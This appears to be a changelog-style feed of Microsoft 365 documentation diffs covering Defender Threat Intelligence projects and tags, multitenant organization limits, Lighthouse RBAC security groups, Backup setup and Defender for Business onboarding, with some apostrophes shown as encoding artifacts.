-2. To create a project through an investigation, perform an indicator search from the Threat Intelligence search bar and click on the ΓÇÿAdd to ProjectΓÇÖ icon.
-
-3. If creating a new project, select the ΓÇÿAdd New ProjectΓÇÖ link, fill in the required fields and ΓÇÿSaveΓÇÖ your new project. If you already have an existing project you would like to add the artifact to, please select or scroll down and select the project you want.
-
- ![Add New Project](media/projectsAddNewProjectDetails.png)
-
-## Managing Projects
-
-Once a user has created projects, they can manage them inside of the Projects portion of the platform. The initial Project Home page highlights all the projects the user can see and provides filtering methods based on project properties. The Project Home page defaults to the Team projects associated with Defender TI users in their tenant. They have the option to select any personal projects they have created as well as projects that have been shared with them to contribute to.
-
-![Managing Projects](media/projectsHomePage.png)
-
-1. Users can view the details of a project simply by clicking on the project name.
-2. Depending on the level of access, users can then make changes to the project directly by clicking the edit button in the top right corner.
-3. Users may also delete a project if they are the owner of the project. They can also choose to manually add artifacts using the "Add Artifacts" button in the top right corner.
-
-## Best Practices
-
-When it comes to using Defender TI to investigate potential threats, we recommend executing the following workflows as these steps will enable you to gather strategic and operational intelligence before diving into tactical intelligence.
-
-Users can perform various types of searches within Defender TI. As such, itΓÇÖs important to approach your intelligence gathering method in a way that presents you with broad results before diving into investigating specific indicators. For example, if you search an IP address against the Defender TI Home Page, what articles have an association with that IP address? What information do these articles present about the IP address that you wouldnΓÇÖt otherwise find navigating directly to the IP addressΓÇÖ Data tab for dataset enrichment. For example, has this IP address been identified as a possible C2, who is the threat actor, what other related indicators of compromise is listed in the article, what TTPs is the threat actor using and who are they targeting?
-
-In addition to performing various types of searches with Defender TI, users can collaborate on investigations together. That said, users are encouraged to create projects, add indicators related to an investigation to a project and add collaborators to a project if more than one person is working on the same investigation. This helps reduce time spent analyzing the same IOCs and should result in a quicker workflow observed.
threat-intelligence Using Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/using-tags.md
-
Title: 'Using Tags in Microsoft Defender Threat Intelligence (Defender TI)'
-Description: 'In this how-to article, learn about the tag types and how to add, modify, delete and search custom tags in Microsoft Defender Threat Intelligence (Defender TI).'
----- Previously updated : 08/02/2022---
-# Using tags
-Microsoft Defender Threat Intelligence (Defender TI) tags are used to provide quick insight about an artifact, whether derived by the system or generated by other users. Tags aid analysts in connecting the dots between current incidents and investigations and their historical context for improved analysis.
-
-The Defender TI platform offers two types of tags: system and custom tags.
-
-![Using Tags Chrome HomePage](media/UsingTagsChromeHomePage.png)
-
-## Prerequisites
--- A Microsoft Entra ID or personal Microsoft account. [Login or create an account](https://signup.microsoft.com/)-- A Microsoft Defender Threat Intelligence (Defender TI) Premium license.
- > [!NOTE]
- > Users without a Defender TI Premium license will still be able to log into the Defender Threat Intelligence Portal and access our free Defender TI offering.
-
-## System tags
-
-These tags are automatically generated by the platform for users to guide their analysis and require no input or effort on the user's part.
-
-System tags can include:
--- **Routable:** indicates that the artifact is accessible.-- **ASN:** pulls an abbreviated portion of an IP address ASN description into a tag to provide analysts context into who the IP address belongs to.-- **Dynamic:** indicates if a domain is owned by a dynamic DNS service such as No-IP or Change IP.-- **Sinkhole:** indicates that an IP address is a research sinkhole used by security organizations to investigate attack campaigns and therefore the domains associated will not be directly connected to each other.-
-![Tags System](media/tagsSystem.png)
-
-## Custom tags
-
-Custom Tags inside of Defender TI to bring context to indicators of compromise (IOCs) and make analysis even simpler by identifying those domains that are known bad from public reporting or that have been categorized by your company's analysts. These tags are created manually by users based on their own investigations. These tags enable users to share key insights about an artifact with other Defender TI Premium license users within their tenant.
-
-![Tags Custom](media/tagsCustom.png)
-
-## Adding, Modifying, and Removing Tags
-
-Users have the ability to add their custom own tags to the tag cluster by entering them into the tag bar. These tags are viewable to the individual user and the user's team members if their organization is a Defender TI customer. Tags entered into the system are private and not shared with the larger community.
-
-Just as users can add tags, they can also modify or remove them. Once a tag is added by a user, it can be modified or removed by that same user or by another paid licensed user within their Enterprise organization. This allows for easy collaboration amongst the Security team.
-
-1. Access the [Defender Threat Intelligence Portal](https://ti.defender.microsoft.com/) .
-2. Complete Microsoft authentication to access portal.
-3. Search an indicator in the Threat Intelligence search bar that you would like to add tag(s) for.
-
- ![Tags Search](media/tagsSearch.png)
-
-4. Select the ΓÇÿEdit TagsΓÇÖ drop-down in the upper left-hand corner of the Defender TI portal.
-
- ![Tags Search Edit Tags](media/tagsSearchEditTags.png)
-
-5. Add any tags you would like to associate with this indicator.
-
- > [!Note]
- > Press the Tab key to add a new indicator.
-
- ![Tags Search Add Tags](media/tagsSearchAddTags.png)
-
-6. Once all your tags have been added, save your changes by selecting the Save button.
-
- ![Tags Search Save Tags](media/tagsSearchSaveTags.png)
-
-7. To edit tags, repeat step 3. Remove any tags by selecting the ΓÇÿXΓÇÖ at the end of the tag name or add new tags as you did in step 4.
-
-8. Save your changes.
-
- ![Tags Search Tags](media/tagsSearchTags.png)
-
-## Viewing and Searching Tags
-
-Users can view tags that were added by themselves or others within their tenant after searching an IP, domain, or host artifact.
-
-![Tags Custom](media/tagsCustom.png)
-
-1. Access the [Defender Threat Intelligence Portal](https://ti.defender.microsoft.com/).
-2. Complete Microsoft authentication to access portal.
-3. Users can search against custom tags via Defender TIΓÇÖs Threat Intelligence Search by selecting the Tag search type in the Threat Intelligence search bar drop-down and searching against the tag value to identify all other indicators that share that same tag value.
-
- ![Search Tag](media/searchTag.png)
-
-Common Tag Use Case Workflow
-LetΓÇÖs say a triage analyst investigates an incident and finds that it is related to phishing. That analyst can add ΓÇ£phishΓÇ¥ as a tag to the indicators of compromise related to that incident. Later, the incident response and threat hunting team can further analyze these indicators of compromise and work with their cyber threat intelligence counterparts to identify which actor group was responsible for their phishing incident. They can then add another ΓÇ£[actor name]ΓÇ¥ tag to those indicators of compromise or what infrastructure was used that connected them to other related indicators of compromise, such as a ΓÇ£[SHA-1 hash]ΓÇ¥ custom tag.
-
-## Next steps
-
-For more information, see:
--- [What is Microsoft Defender Threat Intelligence (Defender TI)?](index.md)-- [Data sets](data-sets.md)-- [Sorting, filtering, and downloading data](sorting-filtering-and-downloading-data.md)-- [Reputation scoring](reputation-scoring.md)-- [Analyst insights](analyst-insights.md)-- [Using projects](using-projects.md)
threat-intelligence What Is Microsoft Defender Threat Intelligence Defender Ti https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/what-is-microsoft-defender-threat-intelligence-defender-ti.md
-
Title: 'What is Microsoft Defender Threat Intelligence (Defender TI)?'
-description: 'In this overview article, learn about the main features that come with Microsoft Defender Threat Intelligence (Defender TI).'
------ Previously updated : 08/02/2022---
-# What is Microsoft Defender Threat Intelligence (Defender TI)?
-
-Microsoft Defender Threat Intelligence (Defender TI) is a platform that streamlines triage, incident response, threat hunting, vulnerability management, and cyber threat intelligence analyst workflows when conducting threat infrastructure analysis and gathering threat intelligence. Analysts spend a significant amount of time on data discovery, collection, and parsing, instead of focusing on what actually helps their organization defend themselves--deriving insights about the actors through analysis and correlation.
-
-Often, analysts must go to multiple repositories to obtain the critical data sets they need to assess a suspicious domain, host, or IP address. DNS data, WHOIS information, malware, and SSL certificates provide important context to indicators of compromise (IOCs), but these repositories are widely distributed and donΓÇÖt always share a common data structure, making it difficult to ensure analysts have all relevant data needed to make a proper and timely assessment of suspicious infrastructure.
-
-Interacting with these data sets can be cumbersome and pivoting between these repositories is time-consuming, draining the resources of security operations groups that constantly need to re-prioritize their response efforts.
-
-Cyber Threat Intelligence Analysts struggle with balancing a breadth of threat intelligence ingestion with the analysis of which threat intelligence poses the biggest threats to their organization and/or industry.
-
-In the same breadth, Vulnerability Intelligence Analysts battle correlating their asset inventory with CVE information to prioritize the investigation and remediation of the most critical vulnerabilities associated with their organization.
-
-MicrosoftΓÇÖs goal is to re-imagine the analyst workflow by developing a platform, Defender TI, that aggregates and enriches critical data sources and displays data in an innovative, easy to use interface to correlate when indicators are linked to articles and vulnerabilities, infrastructure chain together indicators of compromise (IOCs), and collaborate on investigations with fellow Defender TI licensed users within their tenant. With security organizations actioning an ever-increasing amount of intelligence and alerts within their environment, having a Threat Analysis & Intelligence Platform that allows for accurate and timely assessments of alerting is important.
-
-Below is a screenshot of Defender TIΓÇÖs Threat Intelligence Home Page. Analysts can quickly scan new featured articles as well as begin their intelligence gathering, triage, incident response, and hunting efforts by performing a keyword, indicator, or CVE-ID search.
-
-![TI Overview Edge Screenshot](media/tiOverviewEdgeScreenshot.png)
-
-## Defender TI articles
-Articles are narratives by Microsoft that provide insight into threat actors, tooling, attacks, and vulnerabilities. Defender TI featured and articles are not blog posts about threat intelligence; while they summarize different threats, they also link to actionable content and key indicators of compromise to help users take action. By including this technical information in the threat summaries, we enable users to continually track threat actors, tooling, attacks, and vulnerabilities as they change.
-
-## Featured articles
-
-The featured article section of the Defender TI Threat Intelligence Home Page (right below the search bar) shows you the featured Microsoft content:
-
-![TI Overview Featured Articles](media/tiOverviewFeaturedArticles.png)
-
-Clicking the article takes you to the underlying article content. The article synopsis gives the user a quick understanding of the article. The Indicators call-out shows how many Public and Defender TI indicators are associated with the article.
-
-![TI Overview Featured Article](media/tiOverviewFeaturedArticle.png)
-
-## Articles
-
-All articles (including featured articles) are listed under the Microsoft Defender TI Threat Intelligence Home Page articles section, ordered by their creation date (descending):
-
-![TI Overview Articles](media/tiOverviewArticles.png)
-
-## Article descriptions
-
-The description section of the article detail screen contains information about the attack or attacker profiled. The content can range from very short (in the case of OSINT bulletins) or quite long (for long-form reporting ΓÇô especially when Microsoft has augmented the report with content). The longer descriptions may contain images, links to the underlying content, links to searches within Defender TI, attacker code snippets, and firewall rules to block the attack:
-
-![TI Overview Article Description](media/tiOverviewArticleDescription.png)
-
-## Public indicators
-
-The public indicators section of the screen shows the previously published indicators related to the article. The links in the public indicators take one to the underlying Defender TI data or relevant external sources.
-
-![TI Overview Article Public Indicators](media/tiOverviewArticlePublicIndicators.png)
-
-## Defender TI indicators
-
-The Defender TI indicators section covers the indicators that Defender TIΓÇÖs research team has found and added to the articles.
-
-These links also pivot into the relevant Defender TI data or the corresponding external source.
-
-![TI Overview Article Defender TI Indicators](media/tiOverviewArticleDefenderTiIndicators.png)
-
-## Vulnerability articles
-
-Defender TI offers CVE-ID searches to help users identify critical information about the CVE. CVE-ID searches result in Vulnerability Articles.
-
-Vulnerability Articles provide key context behind CVEs of interest. Each article contains a description of the CVE, a list of affected components, tailored mitigation procedures and strategies, related intelligence articles, references in Deep & Dark Web chatter, and other key observations. These articles provide deeper context and actionable insights behind each CVE, enabling users to more quickly understand these vulnerabilities and quickly mitigate them.
-
-Vulnerability Articles also include a Defender TI Priority Score and severity indicator. The Defender TI Priority Score is a unique algorithm which reflects the priority of a CVE based on the CVSS score, exploits, chatter, and linkage to malware. Furthermore, the Defender TI Priority Score evaluates the recency of these components so users can understand which CVEs should be remediated first.
-
-## Reputation scoring
-
-Defender TI provides proprietary reputation scores for any Host, Domain, or IP Address. Whether validating the reputation of a known or unknown entity, this score helps users quickly understand any detected ties to malicious or suspicious infrastructure. The platform provides quick information about the activity of these entities, such as First and Last Seen timestamps, ASN, country/region, associated infrastructure, and a list of rules that impact the reputation score when applicable.
-
-![Reputation Summary Card](media/reputationSummaryCard.png)
-
-IP reputation data is important to understanding the trustworthiness of your own attack surface and is also useful when assessing unknown hosts, domains or IP addresses that appear in investigations. These scores will uncover any prior malicious or suspicious activity that impacted the entity, or other known indicators of compromise that should be considered.
-
-For more information, see [Reputation scoring](reputation-scoring.md).
-
-## Analyst insights
-
-Analyst insights distill MicrosoftΓÇÖs vast data set into a handful of observations that simplify the investigation and make it more approachable to analysts of all levels.
-
-Insights are meant to be small facts or observations about a domain or IP address and provide Defender TI users with the ability to make an assessment about the indicator queried and improve a user's ability to determine if an indicator being investigated is malicious, suspicious, or benign.
-
-For more information, see [Analyst insights](analyst-insights.md).
-
-![Summary Tab Analyst Insights](media/summaryTabAnalystInsights.png)
-
-## Data sets
-Microsoft centralizes numerous data sets into a single platform, Defender TI, making it easier for MicrosoftΓÇÖs community and customers to conduct infrastructure analysis. MicrosoftΓÇÖs primary focus is to provide as much data as possible about Internet infrastructure to support a variety of security use cases.
-
-Microsoft collects, analyzes, and indexes Internet data via Passive DNS sensors, port scanning, URL and file detonation, and other sources to assist users in detecting threats, prioritizing incidents, and identifying infrastructure associated with threat actor groups. Users' URL searches may be used to automatically initiate detonations if there is no available detonation data for a URL at the time of the request. The data collected from such detonations is used to populate results for any future searches for that URL from the user who submitted the original search or any other users of the platform.
-
-Supported Internet datasets include Resolutions, WHOIS, SSL Certificates, Subdomains, DNS, Reverse DNS, and Detonation Analysis, as well as derived data sets collected from the Document Object Model (DOM) of detonated URLs, including Trackers, Components, Host Pairs, and Cookies. Additionally, Components and Trackers are also observed from detection rules that are triggered based on the banner responses from port scans or SSL Certificate details. Many of these data sets have various methods to sort, filter, and download data, making it easier to access information that may be associated with a specific indicator type or time in history.
-
-For more information, see:
--- [Sorting, filtering, and downloading data](sorting-filtering-and-downloading-data.md)-- [Data sets](data-sets.md)-
-![ti Overview Data Sets](media/tiOverviewDataSets.png)
-
-## Tags
-
-Defender TI tags are used to provide quick insight about an indicator, whether derived by the system or generated by other users. Tags aid analysts in connecting the dots between current incidents and investigations and their historical context for improved analysis.
-
-The Defender TI platform offers two types of tags: system tags and custom tags.
-
-For more information, see [Using tags](using-tags.md).
-
-![Tags Custom](media/tagsCustom.png)
-
-## Projects
-
-Microsoft Defender TI platform allows users to develop multiple project types for organizing indicators of interest and indicators of compromise from an investigation. Projects contain a listing of all associated indicators and a detailed history that retains the names, descriptions, and collaborators.
-
-When a user searches an IP address, domain, or host in Defender TI, if that indicator is listed within a project the user has access to, the user can see a link to the project from the Projects sections in the Summary tab as well as Data tab. From here, the user can navigate to the details of the project for more context about the indicator before reviewing the other data sets for more information. This helps analysts to avoid reinventing the wheel of an investigation one of their Defender TI tenant users may have already started or add onto that investigation by adding new indicators (indicators of compromise) related to that project (if they have been added as a collaborator to the project).
-
-For more information, see [Using projects](using-projects.md).
-
-![Defender TI Overview Projects](media/defenderTIOverviewProjects.png)
-
-## Data residency, availability, and privacy
-
-Microsoft Defender Threat Intelligence contains both global data and customer-specific data. The underlying internet data is global Microsoft data; labels applied by customers are considered customer data. All customer data is stored in the region of the customerΓÇÖs choosing.
-
-For security purposes, Microsoft collects users' IP addresses when they log in. This data is stored for up to 30 days but may be stored longer if needed to investigate potential fraudulent or malicious use of the product.
-
-In the case of a region down scenario, customers should see no downtime as Defender TI uses technologies that replicate data to a backup regions.
-
-Defender TI processes customer data. By default, customer data is replicated to the paired region.
-
-## Next steps
-
-For more information, see:
--- [Quickstart: Learn how to access Microsoft Defender Threat Intelligence and make customizations in your portal](learn-how-to-access-microsoft-defender-threat-intelligence-and-make-customizations-in-your-portal.md)-- [Data sets](data-sets.md)-- [Searching and pivoting](searching-and-pivoting.md)-- [Sorting, filtering, and downloading data](sorting-filtering-and-downloading-data.md)-- [Infrastructure chaining](infrastructure-chaining.md)-- [Reputation scoring](reputation-scoring.md)-- [Analyst insights](analyst-insights.md)-- [Using projects](using-projects.md)-- [Using tags](using-tags.md)
backup Backup Setup https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/backup/backup-setup.md
Get started with Microsoft 365 Backup by following these simple three steps in t
## Step 1: Set up pay-as-you-go billing + Microsoft 365 Backup is a pay-as-you-go offering that charges based on consumption, unlike traditional seat-based licenses. To set up pay-as-you-go for Microsoft 365 Backup, you will need to have this information: > [!div class="checklist"]
Microsoft 365 Backup is a pay-as-you-go offering that charges based on consumpti
Once you have the information on this list, you are ready to [set up pay-as-you-go billing for Microsoft 365 Backup](backup-billing.md).
-<!To set up pay-as-you-go billing, follow the steps in [Configure Microsoft Syntex for pay-as-you-go billing](../syntex-azure-billing.md).>
+</br>
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RW1k4TO]
+
+</br>
### Permissions
business-premium M365bp Protect Against Malware Cyberthreats https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/business-premium/m365bp-protect-against-malware-cyberthreats.md
To turn on Defender for Business, you actually initiate the provisioning process
2. In the navigation bar, go to **Assets** > **Devices**. This action initiates the provisioning of Defender for Business for your tenant. You know this process has started when you see a message like what's displayed in the following screenshot:
- :::image type="content" source="../security/defender-business/medib-hangon-provisioning.png" alt-text="Screenshot of the screen that indicates Defender for Business is provisioning.":::
+ :::image type="content" source="../medib-hangon-provisioning.png" alt-text="Screenshot of the screen that indicates Defender for Business is provisioning.":::
It might take a few hours for your tenant to finish provisioning before you can onboard devices or complete the setup and configuration process.
enterprise Join Leave Multi Tenant Org https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/join-leave-multi-tenant-org.md
Title: Join or leave a multitenant organization in Microsoft 365 (Preview)
+ Title: Join or leave a multitenant organization in Microsoft 365
f1.keywords:
description: Learn how to join or leave a multitenant organization in Microsoft 365.
-# Join or leave a multitenant organization in Microsoft 365 (Preview)
-
-> [!NOTE]
-> Multitenant organizations in Microsoft 365 is available in [targeted release](/microsoft-365/admin/manage/release-options-in-office-365).
+# Join or leave a multitenant organization in Microsoft 365
To join a multitenant organization, a global administrator in the owner organization must first add your organization to the multitenant organization. Once they've done that, you can join the multitenant organization. You'll need the tenant ID of the owner organization in order to join.
enterprise Plan Multi Tenant Org Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/plan-multi-tenant-org-overview.md
Title: Plan for multitenant organizations in Microsoft 365 (Preview)
+ Title: Plan for multitenant organizations in Microsoft 365
f1.keywords:
description: Learn how to plan for multitenant organizations in Microsoft 365.
-# Plan for multitenant organizations in Microsoft 365 (Preview)
+# Plan for multitenant organizations in Microsoft 365
> [!NOTE]
-> Multitenant organizations in Microsoft 365 is available in [targeted release](/microsoft-365/admin/manage/release-options-in-office-365) in Microsoft 365 commercial cloud environments. Multitenant organizations is not available in Microsoft 365 GCC, GCC High, DoD, or Microsoft 365 China (operated by 21Vianet).
+> Multitenant organizations is not available in Microsoft 365 GCC, GCC High, DoD, or Microsoft 365 China (operated by 21Vianet).
If your organization manages multiple Microsoft 365 tenants, you can set up a multitenant organization in Microsoft 365 to facilitate collaboration and resource access between tenants. Creating a multitenant organization and synchronizing users between tenants provides a more seamless collaboration experience between the users in different tenants when [searching for each other](/microsoft-365/enterprise/multi-tenant-people-search), using Microsoft Teams and meetings, and collaborating on files.
Multitenant organizations synchronize users between tenants using Microsoft Entr
We recommend starting with a small set of users before rolling out to the entire organization. When you do the complete rollout, we highly recommend synchronizing all users across all tenants in your multitenant organization for the best user experience. However you can synchronize a subset of users if you need to, including different users to different tenants.
-When you configure user synchronization in the Microsoft 365 admin center, the same users and groups are synchronized to all tenants in the multitenant organization. Synchronizing different users to different tenants must be configured in Microsoft Entra ID.
+When you configure user synchronization in the Microsoft 365 admin center, the same users are synchronized to all tenants in the multitenant organization. Synchronizing different users to different tenants must be configured in Microsoft Entra ID.
Once user synchronization has been configured, you can adjust the synchronization settings, including user scope and attribute mapping, in Microsoft Entra ID. (While you can create multiple cross-tenant synchronization configurations for a single external tenant, we recommend that you only use one for ease of administration.) For more information, see [Configure cross-tenant synchronization](/azure/active-directory/multi-tenant-organizations/cross-tenant-synchronization-configure).
Once user synchronization has been configured, you can adjust the synchronizatio
If you have existing cross-tenant synchronization configurations in Microsoft Entra ID, they continue to operate after you set up a multitenant organization in Microsoft 365. You can continue to use these configurations to synchronize users for your Microsoft 365 multitenant organization. (Note that the Microsoft 365 admin center won't recognize these configurations and the outbound sync status will show as not configured.)
+If you already have B2B member users synchronized with tenants that are part of the MTO, those users will immediately become MTO members upon MTO formation.
+ You can synchronize users between tenants using the Microsoft 365 admin center. This will create new cross-tenant synchronization configurations in Microsoft Entra ID. Both the new and previously existing configurations will run and synchronize the users that you've specified. We recommend that you only have a single configuration to synchronize users to a given tenant. If you want to synchronize the same users to every tenant, [configure synchronization in the Microsoft 365 admin center](sync-users-multi-tenant-orgs.md). If you want to synchronize different users to different tenants, [configure synchronization in Microsoft Entra ID](/azure/active-directory/multi-tenant-organizations/cross-tenant-synchronization-configure).
External access is required for chats and calls between tenants. External access
Using [shared channels in Teams](/microsoftteams/shared-channels) with other tenants in a multitenant organization works the same as using shared channels with any other external organization. While the organizational relationship in Microsoft Entra ID is configured as part of multitenant organization configuration, you must still enable shared channels in Teams and configure the B2B direct connect settings in Microsoft Entra ID. For details, see [Collaborate with external participants in a shared channel](/microsoft-365/solutions/collaborate-teams-direct-connect).
-## Limitations for multitenant organizations in Microsoft 365 preview
+## License requirements
+Use of the multitenant organization feature requires Microsoft 365 E3 or E5 subscriptions and Microsoft Entra ID P1 licenses or above in all multitenant organization tenants. For additional details, see [Entra licensing requirements](/entra/identity/multi-tenant-organizations/cross-tenant-synchronization-overview#license-requirements).
+
+## Limitations for multitenant organizations in Microsoft 365
-The following are limitations of the multitenant organizations in Microsoft 365 preview:
+The following are limitations of the multitenant organizations in Microsoft 365:
-- A maximum of five tenants in the multitenant organization is supported.-- A maximum of 100,000 users per tenant is supported.
+- A maximum of 100 tenants in the multitenant organization is supported.
- Teams on the web, Microsoft Teams Rooms (MTR), and VDI/AVD aren't supported. - The ability to grant or revoke permission to receive notifications from other tenants and to switch between tenants isn't supported on mobile. - *People in your organization* links may not work for users from another tenant if their account had originally been a guest and they had previously accessed SharePoint resources. - It might take up to seven days for a user to appear in search once they've been synchronized. Contact Microsoft support if users aren't searchable after seven days. - Support for a guest UserType of member in Power BI is currently in preview. For more information, see [Distribute Power BI content to external guest users with Microsoft Entra B2B](/power-bi/enterprise/service-admin-azure-ad-b2b#who-can-you-invite).
-If you want to add more than five tenants or 100,000 users per tenant, contact Microsoft support.
+If you want to add more than 100 tenants, contact Microsoft support.
For additional limitations, see [Known issues for multitenant organizations](/azure/active-directory/multi-tenant-organizations/multi-tenant-organization-known-issues).
enterprise Set Up Multi Tenant Org https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/set-up-multi-tenant-org.md
Title: Set up a multitenant org in Microsoft 365 (Preview)
+ Title: Set up a multitenant org in Microsoft 365
f1.keywords:
description: Learn how to set up a multitenant org in Microsoft 365.
-# Set up a multitenant org in Microsoft 365 (Preview)
-
-> [!NOTE]
-> Multitenant organizations in Microsoft 365 is available in [targeted release](/microsoft-365/admin/manage/release-options-in-office-365).
+# Set up a multitenant org in Microsoft 365
You can set up a multitenant organization or add tenants to an existing one in the Microsoft 365 admin center.
enterprise Sync Users Multi Tenant Orgs https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/sync-users-multi-tenant-orgs.md
f1.keywords:
description: Learn how to manage user sync in multitenant organizations in Microsoft 365.
-# Synchronize users in multitenant organizations in Microsoft 365 (Preview)
+# Synchronize users in multitenant organizations in Microsoft 365
-> [!NOTE]
-> Multitenant organizations in Microsoft 365 is available in [targeted release](/microsoft-365/admin/manage/release-options-in-office-365).
For users in your tenant to be able to collaborate with those in other tenants, you must synchronize your users to the other tenants.
-We recommend that you [set up security groups in Microsoft Entra ID](/azure/active-directory/fundamentals/how-to-manage-groups) and add the users that you want to synchronize. Note that users must be members of the security group - owners of the group aren't synchronized.
- There are two ways to set up user synchronization: - Share your users with other tenants in a multitenant organization by using the Microsoft 365 admin center (covered in this article)
Both methods use cross-tenant synchronization in Microsoft Entra ID.
If you want to synchronize the same users with all the other tenants in a multitenant organization, we recommend sharing users in the Microsoft 365 admin center. This creates the necessary configurations in Microsoft Entra ID for you.
-If you want to synchronize different users to different tenants, then you must configure cross-tenant synchronization directly in Microsoft Entra ID.
+If you want to synchronize different users to different tenants or synchronize Entra groups, then you must configure cross-tenant synchronization directly in Microsoft Entra ID.
While you can create multiple cross-tenant synchronization configurations for a single external tenant, we recommend that you only use one for ease of administration.
+If you already have B2B member users synchronized with tenants that are part of the MTO, those users will immediately become MTO members upon MTO formation.
+ > [!NOTE] > It might take up to 24 hours for synced users to be available in Microsoft 365 services such as Teams and SharePoint.
To synchronize identities to other tenants in a multitenant organization
1. Expand **Settings** and select **Org settings**. 1. On the **Organization profile** tab, select **Multitenant collaboration**. 1. Select **Share users**.
-1. Select **Select users and groups to share**.
+1. Select **Select users to share**.
1. Choose the security group that you created, and then select **Save**. 1. Select **Yes** to confirm.
To change which users are synchronized to other tenants
1. Expand **Settings** and select **Org settings**. 1. On the **Organization profile** tab, select **Multitenant collaboration**. 1. Select **Share users**.
-1. Select **Edit shared users and groups**.
+1. Select **Edit shared users**.
1. Update the users and groups that you want to sync to other tenants and then select **Save**. 1. Select **Yes** to confirm.
The calendar sharing feature for MTO utilizes [Organization relationships in Exc
## Set up MTO user labels in Teams for tenants in your MTO (Preview)
+> [!NOTE]
+> This feature is available in [targeted release](/microsoft-365/admin/manage/release-options-in-office-365).
+ MTO group admins can now configure an optional label for each tenant that will be displayed alongside MTO synced user's display name in Teams. This allows MTO synced users to be distinguishable within the MTO in Teams interactions. ![Teams people card shows MTO user label "US".](media/sync-users-multi-tenant-orgs/teams-mto-label-people-card.png)
frontline Teams In Hc https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/frontline/teams-in-hc.md
Microsoft 365 and Microsoft Teams offer a number of telemedicine features useful
> [!NOTE] > This functionality is also part of Microsoft Cloud for Healthcare. Learn more about using this solution, which brings together capabilities from Azure, Dynamics 365, and Microsoft 365 at [Microsoft Cloud for Healthcare](/industry/healthcare).
-<!-- Watch the following video to learn more about using the healthcare collection to enhance health team collaboration in Teams.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Hqan]-->
- To get the most benefit for your healthcare organization, first choose which scenarios Microsoft 365 and Teams can help you with in your day-to-day activities, and then make sure that you prepare your Teams environment with the right fundamentals, teams, and apps to support those scenarios. 1. [Choose your scenarios](#scenarios-for-healthcare) you want to implement.
lighthouse M365 Lighthouse Manage Lighthouse Rbac Permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/lighthouse/m365-lighthouse-manage-lighthouse-rbac-permissions.md
Previously updated : 01/17/2024 Last updated : 04/24/2024 audience: Admin
To access the Lighthouse permissions page and manage permissions, you must be a
- To remove multiple users from the Lighthouse RBAC role, select the users you want to remove, and then select **Remove users**. 4. In the confirmation window, select **Remove users** to confirm removal.
+
+## Create or update a security group for a Lighthouse RBAC role
+
+1. In the left navigation pane in <a href="https://go.microsoft.com/fwlink/p/?linkid=2168110" target="_blank">Lighthouse</a>, select **Permissions** > **Lighthouse permissions**.
+
+2. Select a Lighthouse role from the list to open the Lighthouse role details pane.
+
+3. Select **Update security group**.
+
+4. Do one of the following:
+ - Select **Use an existing security group**, select a security group from the list, and then select **Save**.
+ - Select **Create a new security group**, enter a name for the new group, optionally enter a description and add users, and then select **Save**.
+
+> [!NOTE]
+> You must assign the Lighthouse RBAC Administrator role to a role-assignable security group. In addition, to be able to assign roles to a role-assignable security group and/or create role-assignable security groups, you must have a Microsoft Entra ID P1 license. To enable Just-in-Time (JIT) roles, Microsoft Entra IDE Governance or a Microsoft Entra ID P2 license is required.
+>
+> You can assign all other Lighthouse RBAC roles to any security group, whether it's role-assignable or not, but keep the P1 license requirement in mind for role-assignable security groups.
+>
+> To learn more, see [Use Microsoft Entra groups to manage role assignments](/entra/identity/role-based-access-control/groups-concept).
## Next steps
To learn more about each Lighthouse RBAC role to determine which roles users in
[Overview of permissions in Microsoft 365 Lighthouse](m365-lighthouse-overview-of-permissions.md) (article)\ [Set up GDAP for your customers](m365-lighthouse-setup-gdap.md) (article)\
-[Overview of Delegated Access in Microsoft 365 Lighthouse](m365-lighthouse-delegated-access-overview.md) (article)
+[Overview of Delegated Access in Microsoft 365 Lighthouse](m365-lighthouse-delegated-access-overview.md) (article)\
+[Use Microsoft Entra groups to manage role assignments](/entra/identity/role-based-access-control/groups-concept)
security Get Defender Business https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/get-defender-business.md
- Title: Get Microsoft Defender for Business
-description: Find out how to get Microsoft Defender for Business, endpoint protection for small and medium sized businesses.
----- Previously updated : 09/07/2023---- SMB-- m365-security-- tier1--
-# Get Microsoft Defender for Business
-
-[Microsoft Defender for Business](mdb-overview.md) is an endpoint security solution designed especially for small and medium-sized businesses (up to 300 employees). This article describes how to get Defender for Business.
--
-Sections include:
--- **[How to get Defender for Business](#how-to-get-microsoft-defender-for-business)** to protect client devices, such as computers, tablets, and phones-- **[How get Microsoft Defender for Business servers](#how-to-get-microsoft-defender-for-business-servers)**, an add-on that enables you to onboard and protect Windows and Linux servers-- **[Portals that you use](#portals-you-use-for-setup-and-management)** to set up, configure, and manage Defender for Business-- **[Next steps](#next-step)**, such as adding users and assigning licenses.-
-> [!IMPORTANT]
-> You should be a global administrator to complete the tasks described in this article. The person who signs your company up for Microsoft 365 is a global administrator. [Learn more about admin roles in the Microsoft 365 admin center](../../admin/add-users/about-admin-roles.md).
-
-## How to get Microsoft Defender for Business
-
-To get Defender for Business, you can choose from several options:
--- Try or buy the standalone version of Defender for Business.-- Get Microsoft 365 Business Premium, which includes Defender for Business.-- Work with a Microsoft partner who can help you get everything set up and configured.-
-Use the following tabs to learn more about each option.
-
-## [Get Defender for Business (standalone)](#tab/getmdb)
-
-Defender for Business provides advanced security protection for your company's devices. For more information, see [What is Microsoft Defender for Business](mdb-overview.md)?
-
-1. Go to the [Microsoft Defender for Business](https://www.microsoft.com/security/business/threat-protection/microsoft-defender-business) web page, and select an option to try or buy Defender for Business. Fill in the requested information.
-
- If you're starting a trial, look for your acceptance email, which contains your promo code and a link to sign in. And be sure to see the [Trial user guide for Defender for Business](trial-playbook-defender-business.md).
-
